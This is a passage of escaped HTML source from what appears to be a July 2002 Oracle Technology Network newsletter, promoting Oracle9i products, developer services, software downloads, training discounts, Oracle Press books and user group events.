         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td height="9"&gt;&lt;font size="1"&gt;&lt;a href="#newdownloads"&gt;&lt;img src="http://otn.oracle.com/images/bullets_and_symbols/red_arrow_bullet_10.gif" width="12" height="13" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;&lt;a href="#downloads"&gt;Software 
             Downloads&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;font size="1"&gt;&lt;a href="#ou"&gt;&lt;img src="http://otn.oracle.com/images/bullets_and_symbols/red_arrow_bullet_10.gif" width="12" height="13" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;&lt;a href="#ou"&gt;Oracle 
             University&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td height="2"&gt;&lt;font size="1"&gt;&lt;a href="#events"&gt;&lt;img src="http://otn.oracle.com/images/bullets_and_symbols/red_arrow_bullet_10.gif" width="12" height="13" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;&lt;a href="#books"&gt;New 
             Books&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top"&gt;&lt;font size="1"&gt;&lt;a href="#ebn"&gt;&lt;img src="http://otn.oracle.com/images/bullets_and_symbols/red_arrow_bullet_10.gif" width="12" height="13" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td valign="top"&gt; 
             &lt;p&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif" color="#000000"&gt;Worldwide 
               Events: &lt;a href="#americas"&gt;&lt;br&gt;
               Americas&lt;/a&gt; | &lt;a href="#emea"&gt;EMEA&lt;/a&gt; | &lt;a href="#apac"&gt;APAC&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align="left"&gt;&lt;a href="mailto:?subject=OTN%20newsletter%20&amp;body=Interesting%20reading%20from%20the%20Oracle%20Technology%20Network:%20%20http://otn.oracle.com/techblast"&gt;&lt;img src="http://otn.oracle.com/techblast/images/email2friend.gif" width="70" height="80" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
     &lt;/td&gt;
     &lt;td valign="top" width="69%" &gt; 
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a name="feature"&gt;&lt;/a&gt; &lt;b&gt;&lt;font size="4"&gt;&lt;i&gt;This 
         Month's Feature: &lt;/i&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4"&gt; 
         &lt;i&gt;New Developer Services on OTN&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;OTN Members: Get 
         Oracle Software on CD &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Shipped 
         to you Today!&lt;br&gt;
         &lt;/b&gt; Order &lt;a href="https://www.oracle.com/jsp/otntt/index.jsp"&gt;OTN TechTracks&lt;/a&gt; 
         and receive Oracle9i Database Release 2, Oracle9i Application Server Release 
         2, and Oracle Developer Suite (including JDeveloper) CDs for the platform 
         of your choice. TechTracks is a one-year subscription, and it includes 
         access to Oracle Support's KnowledgeBase and CD updates shipped to you 
         whenever there are major new releases of Oracle software. &lt;i&gt;Enter promo 
         code OWC for a $50 savings during the month of July&lt;/i&gt;.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Exchange your Knowledge 
         through OTN Community Code Services&lt;br&gt;
         &lt;/b&gt;&lt;a href="http://otncast.otnxchange.oracle.com/"&gt;OTN Community Code&lt;/a&gt; 
         is a web-browsable CVS repository that lets you review, customize, extend, 
         and share Oracle-related code and coding techniques. OTN populated it 
         with sample application projects, so that you can view sample code source 
         online, download it, submit bugs and suggestions to the development teams, 
         and get email notifications when code is updated. Participate in an Oracle-sponsored 
         project, and then create your own project and share your code with the 
         OTN community.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Web Services Center 
         Now Available on OTN&lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         The &lt;a href="http://otn.oracle.com/tech/webservices/"&gt;OTN Web Services 
         Center&lt;/a&gt; is a new resource for the development and deployment of Web 
         services. Visitors to this new Center can experience live Web service 
         examples, access the latest Web services technical information, and build 
         their own Web services using &lt;a href="http://otn.oracle.com/products/jdev/content.html"&gt;Oracle9i 
         JDeveloper&lt;/a&gt;. The Web Services Center offers information of value to 
         Web services &lt;a href="http://otn.oracle.com/tech/webservices/ws_architect.html"&gt;architects&lt;/a&gt;, 
         &lt;a href="http://otn.oracle.com/tech/webservices/ws_appdev.html"&gt;developers&lt;/a&gt; 
         and &lt;a href="http://otn.oracle.com/tech/webservices/learner.html"&gt;newcomers&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Win Great Prizes 
         in the OTN Web Services Challenge&lt;/b&gt;&lt;br&gt;
         Developers are encouraged to submit their own Web services to the OTN 
         Web Services Challenge. Entering your Web services makes you eligible 
         for fantastic prizes, including a fully decked-out Dell mobile workstation. 
         The Challenge starts August 1, so &lt;a href="http://otn.oracle.com/tech/webservices/challenge.html"&gt;get 
         a head start today&lt;/a&gt; by learning more about the rules. You can even 
         &lt;a href="http://www.oracle.com/go/?&amp;Src=1215798&amp;Act=21"&gt;preregister your 
         interest&lt;/a&gt; in the Challenge.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;New Internet Seminar: 
         J2EE and Web Services on Linux with Oracle9iAS Release 2 &lt;/b&gt;&lt;br&gt;
         &lt;a href="http://www.oracle.com/go/?&amp;Src=1377459&amp;amp;Act=7"&gt;Attend&lt;/a&gt; 
         this on-demand Internet Seminar to learn how to use Oracle9i Application 
         Server Release 2 to develop high performance J2EE and Web Services applications 
         on the Linux operating systems.&lt;/font&gt;&lt;/p&gt;
       &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a name="newdownloads"&gt;&lt;/a&gt;&lt;a href="#feature"&gt;This 
         Month's Feature&lt;/a&gt; | &lt;a href="#news"&gt;News&lt;/a&gt; | &lt;a href="#downloads"&gt;Software 
         Downloads&lt;/a&gt; | &lt;a href="#ou"&gt;Oracle University&lt;/a&gt; | &lt;a href="#books"&gt;New 
         Books&lt;/a&gt; | &lt;a href="#events"&gt;Worldwide Events&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a name="news"&gt;&lt;/a&gt;News&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Special 
         Discount on Red Hat Linux Advanced Server&lt;/font&gt;&lt;/b&gt; &lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         Receive up to 45% discount on the initial purchase of Red Hat Linux Advanced 
         Server. &lt;a href="http://www.oracle.com/go/?&amp;Src=1376382&amp;amp;Act=11"&gt;Find 
         out how&lt;/a&gt;! Offer valid July 1- July 31, 2002. To get more information 
         on Oracle and Linux, &lt;a href="http://otn.oracle.com/tech/linux"&gt;click 
         here&lt;/a&gt;. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Helping WebGain 
         Developers Move to Oracle9i JDeveloper&lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         With all the consolidation taking place in the Java tools space, developers 
         are seeking tools that provide a complete and integrated environment for 
         developing J2EE applications and Web services, and also offer security 
         and stability for the future. Oracle9i JDeveloper delivers on all counts, 
         and the new &lt;a href="http://otn.oracle.com/products/jdev/htdocs/vcmigration/content.html"&gt;WebGain 
         Developer Center on OTN&lt;/a&gt; has been created to give VisualCafe users 
         the resources to &lt;a href="http://otn.oracle.com/products/jdev/htdocs/vcmigration/move.html"&gt;move&lt;/a&gt; 
         rapidly and smoothly to the integrated development environment of Oracle9i 
         JDeveloper. &lt;a href="http://www.oracle.com/ebusinessnetwork/showiseminar.html?1379826&amp;"&gt;Listen&lt;/a&gt; 
         to the interview with Ted Farrell, Oracle's Senior Director of Applications 
         Tools Technology and former WebGain CTO, on &amp;quot;moving to Oracle9i JDeveloper&amp;quot;. 
         &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Oracle9i Application 
         Server # 1 in ECperf Benchmarks&lt;/b&gt; &lt;br&gt;
         In its first ECperf submissions, Oracle9i Application Server Release 2 
         achieved the industry's best ever 'performance' benchmark at 61,863 BBops/min, 
         beating IBM by 39% and BEA by 63%. The proof is in: Oracle9iAS is still 
         faster than IBM and BEA. Oracle9iAS also achieved the best results in 
         the ECperf 'price/performance' category at $5/BBop, 28% better than BEA's 
         top result, and 54% better than IBM's top result. Get the facts: &lt;a href="http://www.oracle.com/go/?&amp;Src=1380990&amp;amp;Act=7"&gt;read&lt;/a&gt; 
         the Oracle9iAS ECperf Benchmark Report now and &lt;a href="http://www.oracle.com/ebusinessnetwork/showiseminar.html?1392270"&gt;tune 
         into&lt;/a&gt; a Live Internet Seminar and Q&amp;amp;A on Wednesday, July 17 at 
         8:00 a.m. PDT for a live presentation and discussion of these record setting 
         results. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Four Internet Seminars 
         on the New Security Features in Oracle9i Application Server Release 2&lt;/b&gt; 
         &lt;br&gt;
         &lt;a href="http://www.oracle.com/ip/deploy/ias/sso/index.html?iseminars.html"&gt;Watch&lt;/a&gt; 
         these four Internet Seminars to learn about the new security features 
         in Oracle9i Application Server Release 2. Oracle9i Application Server 
         Release 2 is the first application server to offer integrated support 
         for Single Sign-On, JAAS and an LDAP compliant directory that together 
         let you cost efficiently secure all your J2EE applications, portals, and 
         Web services.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;OTN Toolbar&lt;/b&gt;&lt;br&gt;
         Search OTN from anywhere on the internet with OTN Toolbar. &lt;a href="http://otn.oracle.com/toolbar/content.html"&gt;Download&lt;/a&gt; 
         today to easily gain access to many of the key features of OTN (including 
         downloads, sample code, documentation, and discussion forums).&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;New Internet Seminar 
         on Oracle9iAS Web Cache and ESI&lt;/font&gt;&lt;/b&gt; &lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         &lt;a href="http://www.oracle.com/ebusinessnetwork/showiseminar.html?1293857"&gt;Watch&lt;/a&gt; 
         this Internet Seminar and learn how Oracle9iAS Web Cache lets you accelerate 
         any Web application running on any server by up to 20 times. Speed applications 
         built in Active Server Pages, Java Server Pages, Servlets, EJBs and more. 
         Deploy with Web servers like Apache and Microsoft IIS as well as application 
         servers like BEA WebLogic, IBM WebSphere, Sun/iPlanet and, of course, 
         Oracle9iAS. Best of all, Oracle9iAS Web Cache uniquely supports caching 
         of both static and dynamically generated content without changing the 
         application, enabling dynamic Web sites to more efficiently deliver rich 
         content and therefore improving the user experience. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Oracle9i Reports 
         data source SDK available now&lt;/b&gt;&lt;br&gt;
         The &lt;a href="http://otn.oracle.com/products/reports/apis/pdstutorial/textPDS/index.html"&gt;Oracle9i 
         Reports data source SDK&lt;/a&gt; allows you to plug in your own data sources 
         and benefit from the sophisticated report creation and distribution environment 
         of &lt;a href="http://otn.oracle.com/products/reports/content.html"&gt;Oracle9i 
         Reports&lt;/a&gt;. Check out the new documentation and samples. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Putting Forms on 
         the Web &lt;/b&gt;&lt;br&gt;
         Looking to move your existing Forms application from client/server to 
         the Web? Want the easy access and maintainability of a web deployed Forms 
         application? Then &lt;a href="http://otn.oracle.com/products/forms/pdf/forms9icstowebmigration.pdf"&gt;check 
         out this new paper&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Struts and Oracle9i 
         JDeveloper&lt;/b&gt;&lt;br&gt;
         Here's a &lt;a href="http://otn.oracle.com/products/jdev/howtos/jsp/StrutsHowTo.html"&gt;cool 
         new article&lt;/a&gt; with detailed instructions on how to configure and use 
         the Jakarta Struts open source Model-View-Controller framework with &lt;a href="http://otn.oracle.com/products/jdev/content.html"&gt;Oracle9i 
         JDeveloper&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt; &lt;b&gt;Quickstart with 
         Oracle9i JDeveloper for BEA developers&lt;/b&gt;&lt;br&gt;
         Are you using BEA's WebLogic and looking for development tools? Here is 
         the &lt;a href="http://otn.oracle.com/centers/mov2jdev"&gt;easy way to start&lt;/a&gt; 
         using the award winning Oracle9i JDeveloper with WebLogic. And if you 
         want to use the fastest J2EE container, check out the &lt;a href="http://www.oracle.com/go/?&amp;Src=1260040&amp;Act=8"&gt;migration 
         kit&lt;/a&gt; to Oracle9iAS.&lt;/font&gt; &lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Wireless and Voice 
         Made Easy With Oracle9i Application Server&lt;/font&gt;&lt;/b&gt; &lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         New Internet lessons give viewers the low-down on how to use the wireless 
         and voice services of Oracle9i Application Server (Oracle9iAS Wireless) 
         to quickly and easily give access to applications and data using any device, 
         over any network. Learn why Oracle is a leader in wireless and voice infrastructure 
         for yourselves! &lt;a href="http://www.oracle.com/go/?&amp;Src=1393043&amp;amp;Act=9"&gt;Check 
         out&lt;/a&gt; the new Internet lessons in the FREE Mobile eKit!&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Snapshot Seminar: 
         Interwoven &amp;amp; Oracle9iAS Content Management&lt;/b&gt;&lt;br&gt;
         Oracle and Interwoven together offer a portal ready, proven, and flexible 
         Enterprise Content Management solution. . Watch a 15 minute on-demand 
         &lt;a href="http://www.oracle.com/go/?&amp;Src=1295633&amp;Act=45"&gt;snapshot seminar&lt;/a&gt; 
         and learn how you can let your users control their content through a portal 
         powered by Oracle and Interwoven. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Updated Oracle9iAS 
         Portal Developer Kit (PDK) - July&lt;br&gt;
         &lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;The &lt;a href="http://portalstudio.oracle.com"&gt;updated 
         Oracle9iAS Portal Developer Kit (PDK)&lt;/a&gt; highlights portlet communication. 
         Using the PDK, you can build smart portlets with such features as inter-portlet 
         communication, page to portlet communication, and portlet reusability. 
         This release includes new J2EE-based and Web Services samples. &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Snapshot Seminar: 
         Documentum &amp;amp; Oracle9iAS Content Management&lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         Oracle and Documentum now offer a joint solution to create, manage and 
         deliver content through Web sites and portals. Watch a 15 minute on-demand 
         &lt;a href="http://www.oracle.com/go/?&amp;Src=1295633&amp;Act=44"&gt;snapshot 
         seminar&lt;/a&gt; and learn how you can let your users control their content 
         through a portal powered by Oracle and Documentum.&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;/p&gt;
       &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a name="newdownloads"&gt;&lt;/a&gt;&lt;a href="#feature"&gt;This 
         Month's Feature&lt;/a&gt; | &lt;a href="#news"&gt;News&lt;/a&gt; | &lt;a href="#downloads"&gt;Software 
         Downloads&lt;/a&gt; | &lt;a href="#ou"&gt;Oracle University&lt;/a&gt; | &lt;a href="#books"&gt;New 
         Books&lt;/a&gt; | &lt;a href="#events"&gt;Worldwide Events&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a name="downloads"&gt;&lt;/a&gt; 
         New Software Downloads&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://otn.oracle.com/software/products/ias/devuse.html"&gt;Oracle9i 
         Application Server Release 2 for Windows NT/2000, AIX, and Compaq Tru64 
         UNIX&lt;/a&gt; &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://otn.oracle.com/software/products/ias/devuse.html"&gt;Oracle9iAS 
         TopLink 4.6 for Linux, UNIX, and Windows NT/2000&lt;/a&gt; &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://otn.oracle.com/software/products/lite/content.html"&gt;Oracle9i 
         Lite Release 5.0.2.0.0 for Sun SPARC Solaris&lt;/a&gt; &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;a href="http://otn.oracle.com/software/tech/windows/odpnet/content.html"&gt;Oracle 
         Data Provider for .NET (ODP.NET) Beta&lt;/a&gt; &lt;/font&gt;&lt;/p&gt;
       &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a name="newdownloads"&gt;&lt;/a&gt;&lt;a href="#feature"&gt;This 
         Month's Feature&lt;/a&gt; | &lt;a href="#news"&gt;News&lt;/a&gt; | &lt;a href="#downloads"&gt;Software 
         Downloads&lt;/a&gt; | &lt;a href="#ou"&gt;Oracle University&lt;/a&gt; | &lt;a href="#books"&gt;New 
         Books&lt;/a&gt; | &lt;a href="#events"&gt;Worldwide Events&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;a name="ou"&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Oracle 
         University&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Special Offer! 
         Save 45% on Oracle9i DBA Certification Training&lt;/font&gt;&lt;/b&gt; &lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         The expanded Oracle Certification Program now offers a true certification 
         levels that are built to fit the needs of IT professionals as well as 
         organizations looking to hire them. Each level constitutes reaching a 
         benchmark of experience and expertise that is industry recognized and 
         approved. And, with each new credential can come increased opportunities, 
         higher pay, and more benefits to keep Oracle professionals successful. 
         &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Oracle9i Certification 
         Savings Plan &amp;#150; Save 45% on 4 Instructor Led inClass courses. 4 for 
         the price of 2! &lt;a href="http://www.oracle.com/education/index.html?promotions.html"&gt;Click 
         here&lt;/a&gt; to learn more! &lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;td valign="top" width="14%" &gt; 
       &lt;div align="center"&gt; 
         &lt;table width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="#FF0000"&gt;
           &lt;tr&gt; 
             &lt;td bgcolor="#000000"&gt; 
               &lt;table width="100%" border="0" cellpadding="5" bgcolor="#FFFF00" cellspacing="0"&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#FFFFFF" valign="top"&gt; 
                     &lt;p align="center"&gt;&lt;img src="http://otn.oracle.com/techblast/images/LightBulb.gif" width="80" height="109"&gt;&lt;/p&gt;
                     &lt;p align="left"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;Seeking 
                       a new job? Check out &lt;a href="http://seeker.dice.com/seeker.epl?rel_code=26&amp;op=2&amp;skill=oracle"&gt;OTN 
                       Skills Marketplace&lt;/a&gt; for all open Oracle-trained positions.&lt;/font&gt;&lt;/p&gt;
                     &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Need 
                       help implementing technology solutions to business problems? 
                       &lt;a href="http://otn.oracle.com/products/oracle9i/htdocs/9iober2/index.html"&gt;Oracle9i 
                       by Example Series tutorials&lt;/a&gt; can save you time.&lt;/font&gt;&lt;/p&gt;
                     &lt;p align="left"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;Taking 
                       an OCP exam? OTN members, take advantage of the 20% exam 
                       &lt;a href="http://www.oracle.com/education/certification/faq/index.html?otndisc.html"&gt;discount&lt;/a&gt;.&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Untitled Document&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;table width="100%" border="0" cellspacing="10" &gt;
   &lt;tr&gt; 
     &lt;td valign="top" width="17%" &gt; 
       &lt;h5&gt;&amp;nbsp;&lt;/h5&gt;
     &lt;/td&gt;
     &lt;td valign="top" width="67%" &gt; 
       &lt;div align="center"&gt; 
         &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a name="newdownloads"&gt;&lt;/a&gt;&lt;a href="#feature"&gt;This 
           Month's Feature&lt;/a&gt; | &lt;a href="#news"&gt;News&lt;/a&gt; | &lt;a href="#downloads"&gt;Software 
           Downloads&lt;/a&gt; | &lt;a href="#ou"&gt;Oracle University&lt;/a&gt; | &lt;a href="#books"&gt;New 
           Books&lt;/a&gt; | &lt;a href="#events"&gt;Worldwide Events&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;div align="center"&gt; 
           &lt;div align="center"&gt; 
             &lt;div align="center"&gt; 
               &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a name="books"&gt;&lt;/a&gt;New 
                 Books &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p align="left"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Oracle9i 
                 DBA 101&lt;/font&gt;&lt;/b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
                 &lt;a href="http://shop.osborne.com/cgi-bin/oraclepress/0072224746.html"&gt;Oracle9i 
                 DBA 101&lt;/a&gt; by Marlene Theriault, Rachel Carmichael, &amp;amp; James 
                 Viscusi (ISBN 0-07-222474-6) explains, step-by-step, how to effectively 
                 administer an Oracle database. Readers will find coverage of the 
                 key Oracle9i new features as well as details on the daily responsibilities 
                 of a DBA and tips on how to successfully accomplish those tasks. 
                 From the exclusive publishers of Oracle Press books, this is the 
                 ideal resource for the aspiring Oracle database administrator. 
                 &lt;/font&gt;&lt;/p&gt;
               &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Oracle9i 
                 Mobile&lt;/b&gt;&lt;br&gt;
                 &lt;a href="http://shop.osborne.com/cgi-bin/oraclepress/007222455X.html"&gt;Oracle9i 
                 Mobile&lt;/a&gt; by Alan Yeung, Philip Stephenson, &amp;amp; Nicholas Pang 
                 (ISBN 0-07-222455-X) helps readers design, deploy, and manage 
                 flexible mobile applications on the Oracle platform. From the 
                 exclusive publishers of Oracle Press books, this resource explains 
                 how to use and extend the mobile services available in Oracle9iAS 
                 Wireless and integrate with other Oracle technologies. Mobilize 
                 any e-business, reach new customers, and deliver critical information 
                 to mobile users with the most scalable and reliable mobile infrastructure 
                 available. &lt;/font&gt;&lt;/p&gt;
               &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt; 
                 &lt;b&gt;Oracle Press User Group Program&lt;/b&gt;&lt;br&gt;
                 Oracle Press has a new User Group Program! Oracle Press supports 
                 the service that User Groups provide to the technical community. 
                 We value our relationship with community-based groups and welcome 
                 the opportunity to form partnerships with User Groups to disseminate 
                 the latest technological information available in Osborne publications. 
                 Osborne encourages participation by technical User Groups that 
                 meet regularly, discuss, teach, and troubleshoot technical topics, 
                 write book reviews, and publish print and/or online newsletters. 
                 &lt;/font&gt;&lt;/p&gt;
             &lt;/div&gt;
           &lt;/div&gt;
         &lt;/div&gt;
       &lt;/div&gt;
       &lt;div align="left"&gt; 
         &lt;p&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Oracle Press can 
           provide User Groups: &lt;/font&gt;&lt;/p&gt;
       &lt;/div&gt;
       &lt;ul&gt;
         &lt;li&gt; 
           &lt;div align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Review 
             copies of Oracle Press books for newsletter reviews &lt;/font&gt;&lt;/div&gt;
         &lt;/li&gt;
         &lt;li&gt; 
           &lt;div align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Book 
             donations and promotional items for User Group events &lt;/font&gt;&lt;/div&gt;
         &lt;/li&gt;
         &lt;li&gt; 
           &lt;div align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;30% 
             discount on bulk purchases of 10 or more books &lt;/font&gt;&lt;/div&gt;
         &lt;/li&gt;
         &lt;li&gt;
           &lt;div align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;And 
             more...&lt;/font&gt;&lt;/div&gt;
         &lt;/li&gt;
       &lt;/ul&gt;
       &lt;div align="center"&gt; 
         &lt;div align="center"&gt; 
           &lt;div align="center"&gt; 
             &lt;div align="center"&gt; 
               &lt;p align="left"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt; 
                 &lt;a href="http://www.osborne.com/usergroups/index.shtml"&gt;Click 
                 here&lt;/a&gt; for complete details about Oracle Press' User Group Program.&lt;/font&gt;&lt;font size="2"&gt; 
                 &lt;/font&gt; &lt;/p&gt;
               &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a name="newdownloads"&gt;&lt;/a&gt;&lt;a href="#feature"&gt;This 
                 Month's Feature&lt;/a&gt; | &lt;a href="#news"&gt;News&lt;/a&gt; | &lt;a href="#downloads"&gt;Software 
                 Downloads&lt;/a&gt; | &lt;a href="#ou"&gt;Oracle University&lt;/a&gt; | &lt;a href="#books"&gt;New 
                 Books&lt;/a&gt; | &lt;a href="#events"&gt;Worldwide Events&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
               &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;a name="events"&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Worldwide 
                 Events &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/div&gt;
             &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;a name="americas"&gt;&lt;/a&gt;Americas&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Oracle 
               User Group Events&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;br&gt;
               &lt;a href="http://otn.oracle.com/collaboration/user_group/events.html"&gt;Find 
               out&lt;/a&gt; where new user group events are happening in your area. 
               &lt;/font&gt; &lt;/p&gt;
